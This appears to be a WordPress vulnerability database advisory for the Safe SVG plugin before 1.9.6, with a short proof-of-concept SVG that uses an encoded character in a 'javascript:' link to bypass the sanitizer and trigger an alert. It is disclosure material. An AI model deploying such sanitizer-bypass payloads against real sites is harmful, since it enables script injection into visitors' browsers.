WordPress Plugin Vulnerabilities

Safe SVG < 1.9.6 - XSS Protection Bypass

Description

By using entities in payload XSS will success to bypass the protection of the Safe SVG Plugin

Proof of Concept

Video POC (for <= 1.9.4): https://drive.google.com/open?id=19-sin0HB97L0tPMUAaGjgE5KjP4lXSuw

Create a SVG with payload below to trigger XSS:
```<?xml version="1.0" standalone="no"?>
<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg">
  <a href="javascript	:alert(1)">
    <circle cx="50" cy="40" r="35"/>
  </a>
</svg> ```

Video PoC for v1.9.5 : https://www.youtube.com/watch?v=hnQA2hc-4_k

Affects Plugins

Plugin icon
safe-svg
Fixed in 1.9.6

References

URL
https://github.com/darylldoyle/svg-sanitizer/issues/31
URL
https://github.com/darylldoyle/safe-svg/issues/9

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher
0xd0ff9
Submitter
0xd0ff9
Submitter website
http://0xd0ff9.wordpress.com
Submitter twitter
https://twitter.com/Jok3rDb
Verified
No
WPVDB ID
a23e3629-c6d7-478a-9c74-0f3d27430216

Timeline

Publicly Published
2019-11-08 (about 4 years ago)
Added
2019-11-08 (about 4 years ago)
Last Updated
2019-11-28 (about 4 years ago)

Other

Published
Title
Published
2022-07-22
Title
Simple Banner < 2.12.0 - Admin+ Stored Cross-Site Scripting
Published
2022-03-15
Title
Post Grid < 2.1.16 - Reflected Cross-Site Scripting via post_types
Published
2015-01-25
Title
WP SlimStat <= 3.9.2 - Stored Cross-Site Scripting (XSS)
Published
2021-10-04
Title
MP3 Audio Player for Music, Radio & Podcast by Sonaar < 2.4.2 - Multiple Admin+ Cross Site Scripting
Published
2023-02-13
Title
DupeOff <= 1.6 - Admin+ Stored XSS